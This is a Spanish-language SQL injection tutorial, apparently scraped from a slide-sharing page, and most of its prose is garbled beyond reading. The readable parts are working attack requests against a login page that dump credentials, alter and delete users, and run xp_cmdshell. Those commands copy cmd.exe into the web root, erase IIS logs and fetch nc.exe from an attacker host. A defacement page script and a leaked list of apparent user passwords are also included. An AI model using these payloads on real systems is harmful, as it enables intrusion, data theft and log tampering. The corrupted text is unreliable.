aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
3 0 3 ! # )" " " ) " 1 :1 " ) H " " " E *Q* KF 1 " J " " " 0 +,- # )" " " ) " 1 :1 " ) ! " 5 " 1 " J " " " 0 $ . # ':!S E8 " " F # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K 0 # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K " " " " " " " * E< Q " & " Q " F "@ % & A . & 6 " . * % " " " 9 " " " * " ( ". * & " " 6 ) " " #0#$% " 7 " 4 " " ' " " & " " & " " . " . "& " " " " " ) ) ) " . 7 . " ( 6 # 6 ! M " " 6 " " 9 " " 6 7 . " ( " J " " " " 6 " " 9 " " 6 ! 4 *=" " " " 6 " ) " " 8" ) ( ! = ' ( A " 6= # * * " " < " " = " 8" + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 ) " " 1 " " = & " 6 #$% " 6 " "
3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
32 ' 6 G " 2& + " " " ) " 9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7 %81;: " * " ( " " " " * & " " 9 " . ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . & + 9 #:- 8 " " 6 5 " " 9 + "* " + 9 " ) " " " " " + " 6 " " & " " " 7 " 5 " 6 " . " " 7 " #$% 4 & 6 9 6 " " > * " + % " ' "> " " 9 " < 6 # " "& + " " < 5 " >5 . ! > "C ) * # % & ! & - M > M . 8< " G " > E #-1 B303B 022CB0@F " M . M " Q QG " "9 "9 Q 3 "9 " + " * "9 6 6 " + " " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" " 6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 " "D ! M < M " " + * " M M M " " + . ' M " #9 )* (
33 M " " + . 1; " " #9 M ( M " " + . G "9 < M " " + . G "9 . ( M " " + + . ) 5 "0 0 @0) ( << " " " " * " " " M " " MQJ " + " ; " " B % ! ( 01 ( , :! " 9 " " )+ 1 0 " . II )+ 5 . 0' ' % . " " F )+ 6 0S " * " ) " " " ) "I )+ 5 . 59 = 6. & ** " * . & " " 9 " " = " * " " 6 = " " " " " " ( . 6 . (( # + ; & " . " > > < 1 ) 9 " * " 9 = = & + 9 " ) " " "& " * 9 . " " + 9 " < " ) " " " " " " ) " " ) 8 " . . & . ( " " " 6 " " " " D " 1 + 6 9 " "* ( " " " * . 9 " " ") ( " " " " * " ; ) 7 . " = + # 9 " " " " " #0#$%& . " " " " . / " 9 " 9 67" " " " " " + * " " " #$% 4 E8" . O1 < / # + # * % d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >

Recommandé

(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura
Kátia Amaral
 
60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang
Thanh Hang
 
Libro deapoyometminjaresme
Libro deapoyometminjaresmeLibro deapoyometminjaresme
Libro deapoyometminjaresme
adriana barba
 
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaRicardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Dorival Leandro
 
Curso de guitarrra
Curso de guitarrraCurso de guitarrra
Curso de guitarrra
Thalles Anderson
 
بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...
Haleh Hadaegh
 
Vật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangVật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trang
jb00007
 
The Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueThe Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'Amérique
Antoine Patricot
 

Recommandé

(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura(Guia para elaborar,_estrutura
(Guia para elaborar,_estrutura
Kátia Amaral
 
60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang60141653 su-hai-long-khach-hang
60141653 su-hai-long-khach-hang
Thanh Hang
 
Libro deapoyometminjaresme
Libro deapoyometminjaresmeLibro deapoyometminjaresme
Libro deapoyometminjaresme
adriana barba
 
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloriaRicardo%20 gondim%20 %20soli%20deo%20gloria
Ricardo%20 gondim%20 %20soli%20deo%20gloria
Dorival Leandro
 
Curso de guitarrra
Curso de guitarrraCurso de guitarrra
Curso de guitarrra
Thalles Anderson
 
بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...بهینه سازی استفاده از آنزیمهای پروتئاز...
بهینه سازی استفاده از آنزیمهای پروتئاز...
Haleh Hadaegh
 
Vật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trangVật liệu cơ khí phạm đình tân, 137 trang
Vật liệu cơ khí phạm đình tân, 137 trang
jb00007
 
The Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'AmériqueThe Colbert Report. La satire politique qui réveille l'Amérique
The Colbert Report. La satire politique qui réveille l'Amérique
Antoine Patricot
 
Notes hadeeth
Notes hadeethNotes hadeeth
Notes hadeeth
Light Upon Light
 
Gsp53 1
Gsp53 1Gsp53 1
Gsp53 1
ครูสุชาติ ขุนฤทธิ์เอียด
 
2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq
rasikulindia
 
Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaq
Self
 
Ahmad_Raza
Ahmad_RazaAhmad_Raza
Ahmad_Raza
Ahmad Raza
 
Slownik
SlownikSlownik
Slownik
Marcin Polak
 
The Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersThe Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare Providers
Erin L. Albert
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
omidd
 
2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed
RockwellAutomationIR
 
Investor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedInvestor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressed
RockwellAutomationIR
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
bdsea89
 
Small business workshop
Small business workshopSmall business workshop
Small business workshop
Jenny Williams
 
J.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vidaJ.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vida
Patrick François Jarwoski
 
Thirukkural
ThirukkuralThirukkural
Thirukkural
suresh0303
 
Thirukkural.
Thirukkural.Thirukkural.
Thirukkural.
kamal kannan
 
Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta
kmf91
 
Via Respiratoria Unica
Via Respiratoria UnicaVia Respiratoria Unica
Via Respiratoria Unica
Dr. Josep Morera Prat
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de palta
Eliza Ruiz
 
Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sort
Fajar Zain
 
Les antigènes de P .Falciparum
Les antigènes de P .FalciparumLes antigènes de P .Falciparum
Les antigènes de P .Falciparum
Institut Pasteur de Madagascar
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003
rukford1
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijaya
AyuTamii
 

Contenu connexe

Tendances

Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaq
Self
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
omidd
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
bdsea89
 
Small business workshop
Small business workshopSmall business workshop
Small business workshop
Jenny Williams
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de palta
Eliza Ruiz
 

Tendances (18)

Notes hadeeth
Notes hadeethNotes hadeeth
Notes hadeeth
 
Gsp53 1
Gsp53 1Gsp53 1
Gsp53 1
 
2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq2.ideal familybyabdurrazzaq
2.ideal familybyabdurrazzaq
 
Ideal family by abdur razzaq
Ideal family by abdur razzaqIdeal family by abdur razzaq
Ideal family by abdur razzaq
 
Ahmad_Raza
Ahmad_RazaAhmad_Raza
Ahmad_Raza
 
Slownik
SlownikSlownik
Slownik
 
The Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare ProvidersThe Case For Pharmacists As Legal Healthcare Providers
The Case For Pharmacists As Legal Healthcare Providers
 
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسيبررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
بررسي تحليلي و تاريخي فعل هاي پيشوندي در زبان فارسي
 
2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed2017 investors day_v21.4_toq4_compressed
2017 investors day_v21.4_toq4_compressed
 
Investor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressedInvestor2017 show final_v3_rainvestors_compressed
Investor2017 show final_v3_rainvestors_compressed
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
 
Small business workshop
Small business workshopSmall business workshop
Small business workshop
 
J.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vidaJ.w.rochester elixir da_longa_vida
J.w.rochester elixir da_longa_vida
 
Thirukkural
ThirukkuralThirukkural
Thirukkural
 
Thirukkural.
Thirukkural.Thirukkural.
Thirukkural.
 
Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta Saudi Students Guide to Atlanta
Saudi Students Guide to Atlanta
 
Via Respiratoria Unica
Via Respiratoria UnicaVia Respiratoria Unica
Via Respiratoria Unica
 
perfil de mercado de palta
perfil de mercado de paltaperfil de mercado de palta
perfil de mercado de palta
 

Similaire à Tecnicas de sql injection

Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sort
Fajar Zain
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003
rukford1
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijaya
AyuTamii
 
Euawr workshop brochure
Euawr workshop brochureEuawr workshop brochure
Euawr workshop brochure
Ptpg Stuc
 
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
Dimitris Psounis
 
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Geert Van Pamel
 
Media sosial mention2011-libre
Media sosial mention2011-libreMedia sosial mention2011-libre
Media sosial mention2011-libre
Melur Orkid
 
Poverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal miningPoverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal mining
Dr Lendy Spires
 
16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles
Achraf Ourti
